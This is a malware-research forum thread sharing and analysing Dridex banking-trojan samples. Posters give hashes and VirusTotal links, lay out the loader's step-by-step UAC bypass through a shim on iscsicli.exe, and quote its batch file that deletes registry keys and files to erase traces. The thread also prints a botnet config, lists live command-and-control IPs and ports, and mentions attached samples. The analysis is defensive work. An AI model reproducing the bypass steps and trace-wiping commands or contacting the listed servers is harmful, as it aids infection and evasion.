[sysopfb]

Fresh Dridex samples

[sysopfb]

md5 4bdc0b2c44041dd16e40eebc447d1fe8
Packed loader for dridex

[r3shl4k1sh]

md5 4bdc0b2c44041dd16e40eebc447d1fe8
Packed loader for dridex

This downloader uses the Shim (Gootkit) method in order to bypass UAC.

Here's the steps it takes:
1. Creates two files on the %LOCALAPPDATA%Low\ and name them $$$.bat and $$$.sdb (the sdb file is a RedirectEXE shim for the c:\windows\system32\iscsicli.exe file (which has autoElevated manifest)).
2. Register the sdb file using the sdbinst.exe
3. Run the iscsicli.exe
4. The target of the RedirectEXE shim will run the $$$.bat file. This file has the following content:

Code: Select all

start C:\Users\XXXX\AppData\Local\edgE6D5.exe C:\Users\XXXX\Desktop\DRIDEX~1.EX_ 
sdbinst.exe /q /u "C:\Users\XXXX\AppData\LocalLow\$$$.sdb"
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\iscsicli.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB\{f48a0c57-7c48-461c-9957-ab255ddc986e}" /f
del C:\Windows\AppPatch\Custom\{f48a0c57-7c48-461c-9957-ab255ddc986e}.sdb
del %LOCALAPPDATA%Low\$$$.sdb
del %LOCALAPPDATA%Low\$$$.bat

so the bat file is just running again the downloader and delete any traces of the shim from the system.
5. The newly created process will delete the original file and download the Dridex Dll.
6. Run the Dridex dll with:

Code: Select all

rundll32.exe %FILEPATH% NotifierInit

The downloaded Dridex DLL has very low VT detection of 1/57:
https://www.virustotal.com/en/file/bd01 ... /analysis/

In attach unpaked donwloader + the dropped files (sdb, bat) + the downloaded Dridex.

[EP_X0FF]

A New UAC Bypass Method that Dridex Uses
http://blog.jpcert.or.jp/2015/02/a-new- ... -uses.html



It is 2015, but seems there are people around that are completely banned in the web search services.

[EP_X0FF]

Dridex downloader
https://www.virustotal.com/en/file/434f ... 428561299/

Dridex payload dll downloaded via encrypted connection
https://www.virustotal.com/en/file/9637 ... 428561313/

Dridex payload dll unpacked
https://www.virustotal.com/en/file/98c8 ... 428561329/

[EP_X0FF]

+ Dridex 64 bit module.

worker_x64.dll
https://www.virustotal.com/en/file/8594 ... 428566811/

worker_x64.dll unpacked
https://www.virustotal.com/en/file/10ee ... 428566829/

[Xylitol]

Email vector: https://www.virustotal.com/en/file/a9cb ... 434380522/
http://vxvault.net/ViriList.php?MD5=28B ... 5FE0C229EE

Code: Select all

<config botnet="220">
   <server_list>
71.14.1.139:8443
173.230.130.172:2443
94.23.53.23:2443
176.99.6.10:8443
   </server_list>
</config>

---

Code: Select all

Export Table
   TimeDateStamp:          0x557EF5C6  (GMT: Mon Jun 15 15:56:54 2015)
   Name:                   0x0004D25C  ("worker_x32.dll")
   Base:                   0x00000001
   NumberOfFunctions:      0x00000002
   NumberOfNames:          0x00000002
   AddressOfFunctions:     0x0004D248
   AddressOfNames:         0x0004D250
   AddressOfNameOrdinals:  0x0004D258

   Ordinal RVA        Symbol Name
   ------- ---------- ----------------------------------
   0x0001  0x0001B97A "DllRegisterServer"
   0x0002  0x00018996 "DllUnregisterServer"

[unixfreaxjp]

During checked Dridex incident report, figuring the list of alive CNC below:
176.9.143.115 : 2443 < UP
193.13.142.11 : 8443 < Down
185.12.94.48 : 7443 < Up??
VT: https://www.virustotal.com/en/file/1ea2 ... /analysis/
Incident report: https://isc.sans.edu/diary/Botnet-based ... week/19807
Some analysis report (below)..the life analysis record are in here:

The "opening" trap is interesting..I use this to recognize.

Strings..

Traffic..

Memory trace reversing mrthod is used..this is snip at usage of wininet.dll , as good as depack.

Binary indicators..PeStudio < may help to build sigs


Sample is attached. #MalwareMustDie

[unixfreaxjp]

Six up and alive Dridex CNCs

[tim]

Grabbed the latest DLL's from your servers unixfreakjp

64bit dll - https://www.virustotal.com/en/file/5ed8 ... 434722593/
32bit dll - https://www.virustotal.com/en/file/1b47 ... 434722873/